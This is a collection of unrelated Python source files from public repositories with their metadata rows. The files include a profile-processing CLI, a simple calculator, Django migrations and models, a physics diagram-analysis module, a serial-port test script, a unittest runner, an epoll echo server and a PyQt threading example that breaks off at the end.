action='store_true',
help='If --filter is used, the filter applies to dependent tables '
'as well. For example, `parse` rows sharing an `i-id` with a '
'filtered `item` will be filtered as well. This effect is '
'transitive, so `result` rows sharing a `parse-id` with a '
'`parse` row filtered by the cascade will also be filtered.')
subparsers = parser.add_subparsers(help='sub-command help')
select_parser = subparsers.add_parser(
'select', help='select data from a profile'
)
select_parser.add_argument(
'select', metavar='TBL[:COL[@COL..]]',
help='Print the contents of each row in TBL. If COLs are specified, '
'only print contents of these columns. See also the section '
'about DATA SPECIFIERS. e.g. item:i-input@i-wf'
)
select_parser.add_argument(
'--join', nargs=2, metavar=('TBL1', 'TBL2'),
help='Join TBL1 and TBL2 on the first key shared by both. A --select '
'operation can then omit the TBL of the data specifier in order '
'to select from the joined table (--apply and --filter still '
'operate on the original profile), and COL specifiers must be '
'prefixed with the respective table. e.g. '
'select --join parse result parse:i-id@result:mrs'
)
select_parser.set_defaults(func=select)
mkprof_parser = subparsers.add_parser('mkprof', help='write a new profile')
mkprof_parser.add_argument(
'output', metavar='PROFILE',
help='The [incr tsdb()] profile to output.'
)
mkprof_parser.add_argument(
'-r', '--relations',
metavar='PATH',
help='The relations file to use for the output profile. If not '
'specified and the --input-profile option is used, the '
'relations file is copied from the input profile.'
)
mkprof_parser.add_argument(
'--skeleton', action='store_true',
help="Output a skeleton (only 'item' and 'relations' files)."
)
mkprof_parser.set_defaults(func=mkprof)
compare_parser = subparsers.add_parser('compare', help='compare two profiles')
compare_parser.add_argument(
'gold', metavar='PROFILE',
help='The gold profile to compare against.'
)
compare_parser.set_defaults(func=compare)
args = parser.parse_args()
logging.basicConfig(level=50-(args.verbosity*10))
main(args)
| [
"[email protected]"
] | ||
a58ca57dffda1205913b527d204e84d18776f6c1 | 92737a24a00eecc186b61e595176c15c1667a45d | /Day3-5.py | ae8cbb9ab854e115df61d963d42c68e9ad602ff5 | [] | no_license | SydneyKao/Python200805 | e22978dc8c847e32b88f6119b7a97bd216392dc8 | e85a12e53d272bc9943fe1adf812c7c547f2dd19 | refs/heads/master | 2022-11-28T19:22:28.401495 | 2020-08-05T08:42:05 | 2020-08-05T08:42:05 | 285,171,012 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 830 | py | while True:
print('1.加法')
print('2.減法')
print('3.乘法')
print('4.除法')
print('5.離開')
a=input('請輸入選項(數字)')
a=int(a)
if a==1:
b=input('輸入被加數')
c=input('輸入加數')
b=int(b)
c=int(c)
d=b+c
print(d)
if a==2:
b=input('輸入被減數')
c=input('輸入減數')
b=int(b)
c=int(c)
d=b-c
print(d)
if a==3:
b=input('輸入被乘數')
c=input('輸入乘數')
b=int(b)
c=int(c)
d=b*c
print(d)
if a==1:
b=input('輸入被除數')
c=input('輸入除數')
b=int(b)
c=int(c)
d=b/c
print(d)
if a==5:
break
| [
"[email protected]"
] | |
a77483c412e7c547d9c8009cb0a197148210767d | 57c6c5c33282b166b88c4cb52771c138ca72685a | /web/about_me/migrations/0006_auto_20180423_1416.py | 8223f2590cb6e5b0b1dce387e89a007506145596 | [] | no_license | nguyentrisinh/minh_portfolio | d1be80fe7be941a81fc82492389af623a7f46cee | 5bca28bf509463350a07fbb25b88a530f76a6541 | refs/heads/master | 2022-12-15T10:38:32.869760 | 2018-06-05T05:48:59 | 2018-06-05T05:48:59 | 130,328,125 | 0 | 0 | null | 2022-12-08T02:07:26 | 2018-04-20T07:46:48 | CSS | UTF-8 | Python | false | false | 1,248 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.12 on 2018-04-23 07:16
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('cms', '0020_old_tree_cleanup'),
('about_me', '0005_auto_20180423_1236'),
]
operations = [
migrations.RemoveField(
model_name='resumeplugin',
name='cmsplugin_ptr',
),
migrations.RemoveField(
model_name='timelineheader',
name='id',
),
migrations.AddField(
model_name='timelineheader',
name='cmsplugin_ptr',
field=models.OneToOneField(auto_created=True, default='2', on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='about_me_timelineheader', serialize=False, to='cms.CMSPlugin'),
preserve_default=False,
),
migrations.AddField(
model_name='timelineheader',
name='order',
field=models.IntegerField(default=1),
preserve_default=False,
),
migrations.DeleteModel(
name='ResumePlugin',
),
]
| [
"[email protected]"
] | |
5836739666be3009def71d833409a87f19098e23 | 5da93fc9aa002111b702da3b7d80ef22f81df72c | /photolouge/library/migrations/0002_albumphotos_seq.py | 0871a5fb61662d1cf66803214f3e94723bb7f8b9 | [] | no_license | pyarun/dj-photo | 5714fd628861e0a039ee489906263a53b037f1b2 | d431eb6b5b7365921e75c19ff80def9339e4dd2c | refs/heads/master | 2021-06-22T06:27:02.493676 | 2017-08-23T02:51:28 | 2017-08-23T02:51:28 | 100,337,506 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 451 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-08-23 02:18
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('library', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='albumphotos',
name='seq',
field=models.IntegerField(blank=True, null=True),
),
]
| [
"[email protected]"
] | |
e3e0335d0354097cd36c83f3d0301748ab575f15 | 9c9360a8ee033f5b07b0dc319d0fbd07d461b731 | /phi3/d_to_infty/d_to_infty_class.py | a5fbba5f4a277a71e949c659bc8210945b88548d | [] | no_license | batya239/rg-graph | cfe11a2b0f5920455fa4bbfc85867350c5b6833e | f258bde78ff2ae83db016070a85285010ff7aa8a | refs/heads/master | 2021-01-21T14:12:26.110541 | 2015-12-22T14:11:19 | 2015-12-22T14:11:19 | 32,137,689 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 15,077 | py | #! /usr/bin/python
#! encoding: utf8
__author__ = "kirienko"
import graph_state as gs
import networkx as nx
from copy import deepcopy
import graphine, graph_state_config_with_fields
import itertools as it
#import dynamic_diagram_generator
## Filters
connected = graphine.filters.connected
oneIR = graphine.filters.one_irreducible
@graphine.filters.graph_filter
def self_energy(sub_graph_edges, super_graph):
"""
Filter for self-energy subgraphs (with 2 external legs)
"""
if len(sub_graph_edges):
if len([e for e in sub_graph_edges if e.is_external()])==2:
return True
return False
def test(seq,rules):
for comp in rules:
if False in map(lambda (x,y):seq.index(x)<seq.index(y),comp):
return
return seq
def is_significant_subgraph(sg,tv):
"""
Returns True if subgraph 'sg' is significant for time version 'tv',
False otherwise.
Significance means that all nodes of subgraph appear in the time version
sequentially, with no breakage (the order of nodes does not matter).
E.g. for the time version [0,1,2,3,4,5] the subgraph [3,2,4] is significant,
whereas [2,4,5] is not.
"""
for i,v in enumerate(tv):
if v in sg:
if sorted(tv[i:i+len(sg)]) == sg:
return True
else:
return False
class D_to_infty_graph():
def __init__(self,nickel_str):
self.nickel = nickel_str
self.Loops = graph_state_config_with_fields.from_str(self.nickel).loops_count
self.D = self.nx_graph_from_str(nickel_str)
self.U = self.D.to_undirected()
if self.is_zero():
print "Diagram has zero value"
def __str__(self):
return self.nickel
def nx_graph_from_str(self, nickel_str):
"""
Returns networkx MultiGraph object from Nickel string
NB: here we 'forget' about graph_state ancestry
"""
if not ":" in str(nickel_str):
gs_diag = self.static_diag(nickel_str)
edges = [tuple(map(lambda n: n.index, e.nodes)) for e in gs_diag.edges]
ext = [e for e in edges if -1 in e]
ext_index = lambda x: 1-x.index(-1)
g = nx.MultiGraph()
for i,e in enumerate(ext):
edges.remove(e)
edges.append((e[ext_index(e)],-i-1))
g.add_edges_from(edges)
else:
gs_diag = self.dynamic_diag(nickel_str)
edges = [e for e in gs_diag.edges if not e.is_external()]
ext = [e for e in gs_diag.edges if e.is_external()]
g = nx.MultiDiGraph()
for e in edges:
i,j = tuple(map(lambda n: n.index, e.nodes))
g.add_edge(i,j,fields = e.fields)
for k,e in enumerate(ext):
i,j = tuple(map(lambda n: n.index, e.nodes))
g.add_edge(-k-1,j,fields = e.fields)
return g
@staticmethod
def static_diag(diag_from_str):
sc = gs.PropertiesConfig.create()
return sc.graph_state_from_str(diag_from_str)
@staticmethod
def dynamic_diag(diag_from_str):
sc = gs.PropertiesConfig.create(
gs.PropertyKey(name="fields",
is_directed=True,
externalizer=gs.Fields.externalizer()))
return sc.graph_state_from_str(diag_from_str)
@staticmethod
def is_phiphi(fields):
"""
Returns True if array 'fields' contains
at least one of ["aa","dd","ad","da"],
False -- elsewise
"""
return bool(filter(lambda x:x in ["aa","dd","ad","da"],fields))
def get_fields(self,ee):
"""
Returns fields of edges 'ee' in multigraph U.
'ee' is a tuple (node1, node2)
"""
return map(lambda x:str(x.get('fields')),self.U.edge[ee[0]][ee[1]].values())
def find_simple_momenta(self):
"""
Returns pairs (edge,field) where 'edge'
corresponds to simple momentum
"""
ans = set()
counter = 1
edges = set([(e1,e2) for e1,e2 in self.U.edges_iter()])
for e1,e2 in edges:
#print (e1,e2)
if not (e1<0 or e2<0):
fields = [(k,v['fields']) for k,v in self.U.edge[e1][e2].items()]
#print "fields:",fields
for f in fields:
if self.is_phiphi([str(f[1])]):
ans.add(((e1,e2,f[0]),f))
if counter <= self.Loops:
self.U.add_edge(e1,e2,f[0],mom=int("0"*counter+"1"+"0"*(self.Loops-counter),2))
#print "Add mom","0"*counter+"1"+"0"*(Loops-counter)," at",(e1,e2,f[0])
counter += 1
elif e1<0 or e2<0:
self.U.add_edge(e1,e2,0,mom=int("1"+"0"*self.Loops,2))
return list(ans)
def subgraph_simple_momenta(self,gs_subgraph):
"""
:param gs_subgraph: graphine subgraph
:return: list of internal (for this subgraph) momenta, i.g. ['k1','k3']
"""
internal_nodes = [x for x in gs_subgraph.vertices if x>-1]
all_simple_momenta = set([m[0] for m in self.find_simple_momenta()])
subgraph_edges = set(self.U.subgraph(internal_nodes).edges(keys=True))
simple_edges = all_simple_momenta.intersection(subgraph_edges)
return map(lambda x: self.momenta_in_edge(x)[0],simple_edges)
def is_zero(self):
"""
Returns True if diag 'name' has zero value,
False otherwise.
"""
## find simple momenta
self.find_simple_momenta()
## find independent cycles with simple momenta
self.find_cycles()
## copy momenta to undirected graph:
#[[Z[e1][e2][k]['mom'] for k in Z[e1][e2]] for e1,e2 in Z.edges_iter()]
for e1,e2 in self.D.edges_iter():
for k in self.D[e1][e2]:
self.D.add_edge(e1,e2,k,mom=self.U[e1][e2][k]['mom'])
## find 'bridges'
for i in xrange(len(self.D.nodes())-2):
self.flow_near_node(i)
self.U = self.D.to_undirected()
## test bridges over cycles
self.bridges = self.find_bridges()
for b in self.bridges:
test = map(lambda x: int(self.flow_near_node(x),2),b)
if not test[0] & test[1]:
return True
return False
def find_cycles(self):
"""
Black magic explained:
Here we go through the internal nodes (= all nodes except 2) and
search for such ones that have TWO [of 3] edges with
the property 'mom[entum]' defined. Then we can define 'mom' on the third edge
as mom3 = mom1 XOR mom2
In the end 'mom' is defined on the every edge.
"""
# nodp = number of defined properties in each node:
nodp = [sum([sum(map(len,v.values())) for v in self.U[i].values()]) for i in range(len(self.U.node)-2)]
while 5 in nodp:
## 5 means that such a node has 2 of 3 edges with 'mom' defined
cur_node = nodp.index(5)
#print "Current node:",cur_node
mom_map = [(k,map(len,v.values())) for k,v in self.U[cur_node].items()]
#print "mom_map =",mom_map
for elem in mom_map:
if 1 in elem[1] :# 1 means that 'mom' is undefined for such an edge
#print "from_node = %d, to_node = %d"%(cur_node,elem[0])
#print self.U[cur_node][elem[0]]
## edges with already defined 'mom's
m = list(set(self.U[cur_node].keys())-set([elem[0]]))
#print "m =",m
if len(m) == 2:
mom1 = self.U[cur_node][m[0]].values()[0]['mom']
mom2 = self.U[cur_node][m[1]].values()[0]['mom']
elif len(m) == 1 and (len(mom_map)>2 or sum(elem[1])>1): # <-- 'mom' is already defined at
m = self.U[cur_node].keys() # one of two edges between 'from-to' nodes
#print "new m =",m
line_num_1 = [k for k,v in self.U[cur_node][m[0]].items() if 'mom' in v.keys()][0]
line_num_2 = [k for k,v in self.U[cur_node][m[1]].items() if 'mom' in v.keys()][0]
mom1 = self.U[cur_node][m[0]].values()[line_num_1]['mom']
mom2 = self.U[cur_node][m[1]].values()[line_num_2]['mom']
elif len(m) == 1 and len(mom_map)==2 and sum(elem[1])==1:# <-- 'mom's are already defined at
# two edges between the same nodes
mom1 = self.U[cur_node][m[0]][0]['mom']
mom2 = self.U[cur_node][m[0]][1]['mom']
else:
raise
line_num = map(len,self.U[cur_node][elem[0]].values()).index(1)
#print "\tmom1 =",mom1,",\tmom2 =",mom2,",\tmom1^mom2 =",bin(mom1^mom2)
self.U.add_edge(cur_node,elem[0],line_num,mom=mom1^mom2)
nodp = [sum([sum(map(len,v.values())) for v in self.U[i].values()]) for i in range(len(self.U.node)-2)]
return
def find_bridges(self):
"""
Returns pairs of nodes that are connected by bridges:
[(0,1),(2,3),(4,5)]
"""
fields = lambda x: self.U[x[0]][x[1]][x[2]]['fields']
bridges = []
for i in xrange(len(self.U.nodes())-2):
# print "\ni = %d"%i
cur_edge = (i,self.U.node[i]['dot'][0],self.U.node[i]['dot'][1])
# print "Current edge:", cur_edge
bridges += [[cur_edge]]
if str(fields(cur_edge)) == 'dd':
continue
while True:
next_node = cur_edge[1]
#print "next node: %d"%next_node
next_lines= deepcopy(self.U[next_node])
#print "next lines:",next_lines
next_lines[cur_edge[0]].pop(cur_edge[2])
dot = self.U.node[next_node]['dot']
next_lines[dot[0]].pop(dot[1])
for (k,v) in next_lines.items():
if len(v) == 0:
next_lines.pop(k)
#print "next lines:",next_lines
nce1 = next_lines.keys()[0]
nce2 = next_lines[nce1].keys()[0]
cur_edge = (next_node,nce1,nce2)
bridges[-1] += [cur_edge]
if 'd' in str(fields(cur_edge)):
break
bridge_set = set()
# print "bridges:", bridges
for b in bridges:
bridge_set.add(tuple(sorted([b[0][0],b[-1][1]])))
return list(bridge_set)
def flow_near_node(self,node):
"""
Returns the number of simple momenta that flows through the node
by the dotted edge (binary string like '0100').
For directed graphs only.
"""
mom = []
pr = self.D.predecessors(node)
for n in pr:
for nn in self.D[n][node]:
if 'd' == self.D[n][node][nn]['fields'][-1]:
self.D.add_node(node,dot = (n,nn))
continue
mom += [self.D[n][node][nn]['mom']]
to_nodes = self.D.successors(node)
for n in to_nodes:
for nn in self.D[node][n]:
if 'd' == self.D[node][n][nn]['fields'][0]:
self.D.add_node(node,dot = (n,nn))
continue
mom += [self.D[node][n][nn]['mom']]
return bin(mom[0] & mom[1])[2:]
def momenta_near_node(self,node):
"""
The same as 'flow_near_node', but returns the list of momenta.
"""
binary_mom = self.flow_near_node(node)
return ["k%d"%j for j,k in enumerate(binary_mom[::-1]) if int(k) and j < self.Loops]
def momenta_in_edge(self,e):
"""
:param G: networkx MultiGraph
:param edge: (e0,e1,e2)
:return: the list of momenta, i.e. ['k0','k2','k3']
"""
mom = self.U[e[0]][e[1]][e[2]]['mom']
return ["k%d"%j for j,k in enumerate(bin(mom)[:1:-1]) if int(k) and j < self.Loops]
def get_time_versions(self):
"""
Returns all time versions of a graph G with Nickel representation 'nickel_str',
along with all significant subgraphs that correspond every time version:
>>> z = D_to_infty_graph("e12|e3|34|5|55||:0A_dd_aA|0a_Aa|dd_aA|Aa|aA_dd||")
>>> z.get_time_versions()
[([0, 2, 4, 5, 3, 1], [e11|e|:0A_aA_dd|0a|, e12|e3|33||:0A_dd_aA|0a_Aa|aA_dd||])]
Also creates self.tv = self.get_time_versions()
Directed edges in our diagram form directed acyclic graph (DAG) with a root 'root'.
"""
T = nx.DiGraph()
for e1 in self.U.edge:
for e2 in self.D.edge[e1]:
for k in self.D[e1][e2]:
if 'A' in self.D[e1][e2][k]['fields']:
idx = str(self.D[e1][e2][k]['fields']).index('A')
from_node = (e1,e2)[1-idx]
to_node = (e1,e2)[idx]
T.add_edge(from_node,to_node)
## Find all self-energy subgraphs
G = graph_state_config_with_fields.from_str(self.nickel)
subgraphs = [x for x in G.x_relevant_sub_graphs(filters=connected+oneIR+self_energy)]
sg_nodes = [sorted([v for v in sg.vertices if v>0]) for sg in subgraphs]
## Find the root of DAG:
root = [i for i in T.node if T.in_degree(i) == 0][0]
if root < 0:
T.remove_node(root)
root = [i for i in T.node if T.in_degree(i) == 0][0]
## Nodes of DAG:
nodes = list(set(T.nodes())-set([root]))
## Leaves of DAG:
leaves = [l for l in T.nodes() if T.out_degree(l)==0]
## Find all paths from root to every leaf:
paths = []
for i in leaves:
paths += [i for i in nx.algorithms.all_simple_paths(T,root,i)]
## Comparison rules for every two nodes that define whether
## time version is correct:
test_cmp = [[i for i in it.combinations(p,2)] for p in paths]
## Find all possible permutations of nodes
perm = [[root]+list(i) for i in it.permutations(nodes,len(nodes))]
## Apply the rules of comparison
vers = []
for p in perm:
ver = test(p,test_cmp)
if ver:
## Test if subgraph is significant for this time version
vers += [(ver,\
[subgraphs[i] for i, sg in enumerate(sg_nodes) if
is_significant_subgraph(sg,ver)
and '0A' in str(subgraphs[i])
and '0a' in str(subgraphs[i])])]
self.tv = vers
return vers | [
"[email protected]"
] | |
5d53832526d8e829cafcc12e480ba46b812e9761 | b1f8d5dadf805a61faf17e751c1865e8c40f841d | /data_tx.py | b9e3cca33f0a783db351d3849ee6784588d409ec | [] | no_license | bllgg/FPGA-based-CBC-encryptor-and-decryptor | dfb6131a0af75c358dc3a7581f634b475ed07d0a | dd4931846f8423a74758e2a160c23b99971e3407 | refs/heads/master | 2022-12-21T13:55:37.255521 | 2020-09-22T10:01:14 | 2020-09-22T10:01:14 | 257,053,358 | 0 | 0 | null | 2020-04-19T16:54:20 | 2020-04-19T16:54:19 | null | UTF-8 | Python | false | false | 1,301 | py | import serial
import csv
ser = serial.Serial('COM4', 9600, serial.EIGHTBITS, serial.PARITY_NONE, serial.STOPBITS_ONE)
# Enter the port and baudrate correctly
b_array = []
for i in range(128):
b_array.append(i)
# b_array = [170, 186, 139, 136, 200, 220, 173, 170, 42, 50, 131, 136, 72, 84, 165, 170, 171, 171, 155, 136, 201, 205, 189,
# 170, 43, 35, 147, 136, 73, 69, 181, 170, 168, 152, 171, 136, 202, 254, 141, 170, 40, 16, 163, 136, 74, 118, 133,
# 170, 169, 137, 187, 136, 203, 239, 157, 170, 41, 1, 179, 136, 75, 103, 149, 170, 174, 254, 203, 136, 204, 152,
# 237, 170, 46, 118, 195, 136, 76, 16, 229, 170, 175, 239, 219, 136, 205, 137, 253, 170, 47, 103, 211, 136, 77, 1,
# 245, 170, 172, 220, 235, 136, 206, 186, 205, 170, 44, 84, 227, 136, 78, 50, 197, 170, 173, 205, 251, 136, 207, 171,
# 221, 170, 45, 69, 243, 136, 79, 35, 213, 0]
#print (type(b_array))
values = bytearray(b_array)
#print (values)
ser.write(values)
carray =[]
oarray = []
for i in range(128):
cur_byte=ser.read()
carray.append(hex(ord(cur_byte)))
oarray.append(ord(cur_byte))
#print (ord(cur_byte),)
print (carray)
print (oarray)
with open("byte_array.csv", 'w') as myfile:
wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)
wr.writerow(carray)
| [
"[email protected]"
] | |
91fe7628daea821faeaca159fbb7c1edc85ca7c1 | a318ff21e5688b31746822ab87e492cacabbbc33 | /UnittestPackage/Test_Suite_demo.py | 605e4e1635a85ea7b20c3ea044ce1657c185544f | [] | no_license | vaitheeshwaran/Selenium_Exercise | 5302db5ac40def815eca26c2d7811847f49c1295 | 4b22d807a162dafacfde72ad8b8661b78fa6143e | refs/heads/master | 2022-11-18T04:19:16.915194 | 2020-07-20T15:26:26 | 2020-07-20T15:26:26 | 277,124,763 | 1 | 0 | null | 2020-07-05T13:08:27 | 2020-07-04T14:24:10 | Python | UTF-8 | Python | false | false | 457 | py | import unittest
from UnittestPackage.TestcaseDemo1 import TestCaseDemo1
from UnittestPackage.Testcase2 import TestCaseDemo2
# Get the all testcases from TestcaseDem1 and Testcase2
tc1 = unittest.TestLoader().loadTestsFromTestCase(TestCaseDemo1)
tc2 = unittest.TestLoader().loadTestsFromTestCase(TestCaseDemo2)
# create testsuite for both the testcases class
Reg_test = unittest.TestSuite([tc1, tc2])
unittest.TextTestRunner(verbosity=2).run(Reg_test)
| [
"[email protected]"
] | |
492b7b141779215b408ba4101cd7addbbe1fd188 | 77b6b837799a62dc3cd5a76e3c141bc50b7202a3 | /edgeserver.py | ff9283aa7420460a6c64d7cdda4604f6769f5920 | [] | no_license | justinchau92/Multithread-Edge-Select-Servers | 44e80136a1f821d6a0a9c3896e87e81baebbf48e | d841b647ec44c49ccf91ea348a7f411ac23869d5 | refs/heads/master | 2021-09-13T21:54:31.979868 | 2018-05-04T20:15:30 | 2018-05-04T20:15:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,350 | py | # -----------------------------------------------------------------------------
# FUNCTION: EDGE EPO server
#
# DATE: January 06, 2017
#
# DESIGNERS: Paul Cabanez, Justin Chau
#
# PROGRAMMERS: Paul Cabanez, Justin Chau
#
# NOTES: receives an echo from the client and rplies back, utilizes edge level trigging
#
#
#
#
#
# ----------------------------------------------------------------------------*/
from Tkinter import *
import socket
import select
import thread
import time
import datetime
import sys
import signal
#list of inputs you need
fields = 'Server IP' , 'Port'
global root
#---------------------------------------------------
# getTime()
# Time function that gives the current time
# returns timeStamp
#---------------------------------------------------
def getTime():
ts = time.time()
timeStamp = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d_%H:%M:%S')
return timeStamp
#---------------------------------------------------
# edgeFunction(hostIP, port)
# General function to run the epoll (edge triggered) server
# hostIP = IP of the server
# port = port number you want to use for the server
#---------------------------------------------------
def edgeFunction(entries):
#variables
bufferSize = 1024
running = True
SentTotal = 0
ReceivedTotal = 0
sSize = 0
rSize = 0
counter = 0
requestCounter = 0
concurrentConnections = 0
connections = {}
#create the server socket
serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#non-blocking mode
serverSocket.setblocking(0)
#create epoll
epoll = select.epoll()
address = (entries[0][1].get(), int(entries[1][1].get()))
#add socket to connections
connections.update({serverSocket.fileno(): serverSocket})
#allows a bind to occur for reusedaddr
serverSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
#socket binds
serverSocket.bind(address)
print ("Server is listening for connections\n")
serverSocket.listen(10000)
#read when socket accepts connection
epoll.register(serverSocket.fileno(), select.EPOLLIN | select.EPOLLET)
try:
while running:
#checking epoll for any events
events = epoll.poll(-1)
for fileno, event in events:
if fileno == serverSocket.fileno():
while running:
try:
clientConnection, clientAddress = serverSocket.accept()
counter += 1
if counter > concurrentConnections:
concurrentConnections = counter
connections.update({clientConnection.fileno(): clientConnection})
#set new socket to non blocking
clientConnection.setblocking(0)
#register the epoll
epoll.register(clientConnection.fileno(), select.EPOLLIN | select.EPOLLET)
text_file.write("\n\n" +str(clientAddress) + " connected")
text_file.write("\nNumber of connected clients: " + str(counter))
print (str(clientAddress) + " connected.")
print ("\nNumber of connected clients: " + str(counter))
except socket.error:
break
elif event & select.EPOLLIN:
rSock = connections.get(fileno)
#receieve the data and send it back
try:
data = rSock.recv(bufferSize)
clientAddress, clientSocket = rSock.getpeername()
rSize = len(data)
ReceivedTotal += rSize
sSize = len(data)
SentTotal += sSize
rSock.send(data)
requestCounter += 1
if data == 'quit':
rSock.close()
counter -= 1
print "\nClient " + clientAddress + ":" + str(clientSocket) + " has disconnected"
print "\nNumber of connected clients: " + str(counter)
text_file.write("\n\nClient " + clientAddress + ":" + str(clientSocket) + " has disconnected")
text_file.write("\nNumber of connected clients: " + str(counter))
except socket.error:
pass
except KeyboardInterrupt:
Close(epoll,serverSocket,concurrentConnections, ReceivedTotal, SentTotal, requestCounter)
#----------------------------------------------------------------------------
# Close Function
# Function to turn off the server
#
# epoll = epoll object
# serverSocket = the server socket opened
# counter = number of connections
# ReceivedData = Amount of data received from the clients
# SentData = Amount of data sent back to the clients
# Request Counter = number of request the server got from the client
#-----------------------------------------------------------------------------
def Close(epoll,serverSocket,counter, ReceivedData, SentData, requestCounter):
print ("Shutting down Server...")
epoll.unregister(serverSocket.fileno())
epoll.close()
serverSocket.close()
text_file.write("\n\nMax # of concurrent connections: " + str(counter))
text_file.write("\nTotal # of request: " + str(requestCounter))
text_file.write("\nTotal data received: " + str(ReceivedData))
text_file.write("\nTotal data sent: " + str(SentData))
text_file.close()
sys.exit()
#---------------------------------------------------
# makeform - method to create input box and labels
#
# root - the GUI form
# fields - list of inputs you want i.e (serverip, port)
#-------------------------------------------------
def makeform(root, fields):
entries = []
#for each field create an input
for field in fields:
row = Frame(root)
lab = Label(row, width=15, text = field , anchor ='w')
ent = Entry(row)
ent.config(highlightbackground = "gray")
row.pack(side=TOP, fill=X, padx=5, pady=5)
lab.pack(side=LEFT)
ent.pack(side=RIGHT,expand=YES, fill=X)
entries.append((field,ent))
return entries
if __name__ == '__main__':
#serverIP = '192.168.0.16'#raw_input('Enter your server IP \n')
#port = 2017#int(raw_input('What port would you like to use?\n'))
# Create and initialize the text file with the date in the filename in the logfiles directory
filename = str(getTime()) + "_edgeserverlog.txt"
text_file = open(filename, "w")
root = Tk()
ents = makeform(root,fields)
buttonFrame = Frame(root)
buttonFrame.pack(side=TOP,padx=5,pady=5)
b1 = Button(root, text='Start Server', command=(lambda e=ents: edgeFunction(e)))
b1.pack(in_=buttonFrame , side=LEFT, padx=5,pady=5)
root.title("Edge Triggered Server")
root.mainloop()
| [
"[email protected]"
] | |
258f4499779395cfc76b376dd977decdd44810e5 | 9f9d3649fc0bc96fb09ecfc2db5dc0f568d3be07 | /api/models.py | 557489a5ef981026248cfec83f50fa7aeceb49e4 | [] | no_license | mamcjr/api_geral | 3e50f87c92c8db2e83c9af10d6d28a60c9a09265 | 9cd847eeb9d07e1357e40168848642efff5ddedb | refs/heads/main | 2023-02-03T18:34:31.085951 | 2020-12-08T17:21:03 | 2020-12-08T17:21:03 | 319,505,878 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,004 | py | from django.db import models
from .util import estados
# Create your models here.
class Pessoa(models.Model):
"""
Model para controle de pessoas com dados pessoais
"""
class Meta:
db_table = 'pessoa'
nome = models.CharField(max_length=200)
cpf = models.CharField(max_length=11)
email = models.CharField(max_length=100)
endereco = models.ForeignKey('Endereco', on_delete=models.CASCADE)
foto = models.FileField(blank=True, null=True)
def __unicode__(self):
return self.nome
class Endereco(models.Model):
"""
Model para Controle de Endereços
"""
class Meta:
db_table = 'endereco'
rua = models.CharField(max_length=100)
numero = models.CharField(max_length=8)
complemento = models.CharField(max_length=30)
bairro = models.CharField(max_length=30)
cidade = models.IntegerField()
uf = models.CharField(max_length=2,choices=estados.STATE_CHOICES)
def __unicode__(self):
return self.rua | [
"[email protected]"
] | |
5fdca1d0cca376cca9c4c059d9387c611e7a8640 | 3a753d66b764ca30e7c1dea8e108eb1311c6d0ac | /backend/migrations/0001_initial.py | 95f599bd8594e5ca387b82e6fec76bee6f064c1e | [] | no_license | 964666897/Axepanda | 6f2369958b485b232f8847620d0f1a9babbae149 | 9db4d8c7913e4e45f570f500ad807cf198e93478 | refs/heads/master | 2020-07-31T19:53:51.757817 | 2019-09-24T09:54:13 | 2019-09-24T09:54:13 | 210,736,142 | 0 | 0 | null | 2019-09-25T02:12:58 | 2019-09-25T02:12:57 | null | UTF-8 | Python | false | false | 893 | py | # Generated by Django 2.2.2 on 2019-09-20 16:01
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='ExcelFile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('filename', models.CharField(blank=True, max_length=20, null=True, verbose_name='文件名')),
('path', models.CharField(blank=True, max_length=108, null=True, verbose_name='文件路径')),
('size', models.CharField(blank=True, max_length=64, null=True, verbose_name='第1环')),
],
options={
'verbose_name': '文件表',
'verbose_name_plural': '文件表',
},
),
]
| [
"[email protected]"
] | |
1540008bd512df1f4b3938a7d85cbb0985073417 | 1e0ceb6b12f7ae2fc95208b36e9ebf0f48fb0fa7 | /testfile.py | b3ee501a1fd720c812a3dca699aeb2b0263da495 | [] | no_license | zenstamon/zenstamon | d1d4f76716a7248a9210dc89f6c41dc4e96ded30 | 1c0e7194ad99fccae6b71c73684d6944bc6b9423 | refs/heads/master | 2016-08-04T04:27:10.985872 | 2012-11-27T15:28:20 | 2012-11-27T15:28:20 | 6,599,492 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,575 | py | __author__ = 'c0stos3'
#! /usr/bin/python
# -*- coding : utf-8 -*-
from PyQt4 import QtGui, QtCore
import time, sys
gui = QtGui.QApplication.processEvents #a function we use to make sure that the gui wont freeze
class display():#first we make a class that handle the gui object
texttoset = ""
app = QtGui.QApplication(sys.argv) #we make a QT Application object
dialog = QtGui.QDialog() #we make a dialog object
dialog.resize(200, 150) #set size
dialog.setMaximumSize(200, 150) #set maximum size
dialog.setMinimumSize(200, 150) #set minimum size
dialog.setWindowTitle("new dialog") #set title
label = QtGui.QLabel(dialog) #make a label object child of dialog
label.setText("am a text label") #set label text
label.setGeometry(1, 20, 200, 50)#set geometry x,y,width,high
button = QtGui.QPushButton(dialog)#now we make a button object
button.setText("click me !")#set its text
button.setGeometry(1, 60, 200, 50)#set geometry
def changetext(self, value):#we make a function that change the label text
if value == True:
text = str(self.texttoset)#to make sure it will be a string
self.label.setText(text)#set the text
ui = display()#we make an object from the display class
#now it is time to make a QThread class
class mythread(QtCore.QThread):#inherite from QtCore.QThread
#this thread will change the text 10 times from "i have changed by a QThread" to "back all over again for the x time" then when finished changes text to "QThread has finished"
def __init__(self):
QtCore.QThread.__init__(self)#we construct the class
def run(self):#built in function contain the code that the thread will excute
x = 0
while x <= 10:
s = str(x)
